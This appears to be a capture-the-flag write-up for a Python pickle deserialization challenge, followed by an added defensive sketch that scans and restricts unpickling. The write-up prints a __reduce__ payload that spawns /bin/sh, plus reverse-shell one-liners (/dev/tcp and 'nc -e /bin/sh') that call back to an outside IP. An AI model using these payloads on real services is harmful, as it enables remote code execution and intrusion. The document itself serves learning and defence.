Bubble Bass has a vulnerable service. Can you exploit it and read the flag.txt file?
Category: Potent Pwnables
Points: 300
self.received = self.request.recv(1024).strip()
self.result = cPickle.loads(self.received)
Connected to the server..
..the server asks me to add two numbers, and quits w/ 1 second timeout, no time to manually reply.
No problem, wrote a py socket script...
Now clearly it's a Caesar cipher.
Solved w/ my caesar deco..
Now comes the real challenge..
..the server asks me for a file, tried
flag.txt, of course no success.. everything containing
Really? Maybe next time..
Okay, back to the given clue:
self.received = self.request.recv(1024).strip()
self.result = cPickle.loads(self.received)
hmm.. bubble bass.. pickles.. spongebob? hehe..
Tried the test exploit:
    import subprocess

    class RunBinSh(object):
        def __reduce__(self):
            return (subprocess.Popen, (('/bin/sh',),))
..and got the
Server received message from the server, but no shell.. we can't see the server raw output, but I'm on the right way 4 sure..
nc server locally
nc -vv -l -p 6888 to wait for connections and tried to execute on server side the classic
/bin/sh </dev/tcp/188.8.131.52/6888 >&0 2>&0, no success.. the server accept my command but no connection here, maybe some filtering..
Ok, let's test if
nc is enabled on server side..
nc -e /bin/sh 184.108.40.206 6888
we got a reverse shell..
cat flag.txt 4 the win!
Awesome contest shellterlabs.com.
I arrived too late and could not try the other challs, but the next one can count on me :)
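The root cause in the clue is `cPickle.loads(self.received)` running on bytes straight off the socket. As an added example (not part of the original write-up or the challenge code), here is a defender-side sketch in Python 3 `pickle` rather than the server's Python 2 `cPickle`: it lists import/call opcodes in a stream without loading it, and loads through an unpickler that refuses every global lookup. The names `risky_opcodes`, `DataOnlyUnpickler`, `safe_loads` and the sample payloads are assumptions made for the illustration.

```python
import io
import pickle
import pickletools

# Opcodes that import a name or call it; plain data pickles need none of them.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def risky_opcodes(data):
    """Statically list import/call opcodes in a pickle stream without loading it."""
    found = []
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            if opcode.name in RISKY_OPCODES:
                found.append(opcode.name)
    except Exception:
        found.append("MALFORMED")  # a stream that cannot be parsed is also rejected
    return found


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so only plain data loads."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def safe_loads(data):
    return DataOnlyUnpickler(io.BytesIO(data)).load()


class Benign(object):
    """Constructed sample: __reduce__ makes the loader call len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))


PLAIN = pickle.dumps({"a": 1, "b": [2, 3]})  # constructed: data only
CALLS = pickle.dumps(Benign())               # constructed: harmless callable

if __name__ == "__main__":
    print(risky_opcodes(PLAIN), safe_loads(PLAIN))
    print(risky_opcodes(CALLS), pickle.loads(CALLS))  # stock loader runs the call
    try:
        safe_loads(CALLS)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

If the service only needs to exchange simple values, parsing a data-only format such as JSON removes the problem instead of filtering it.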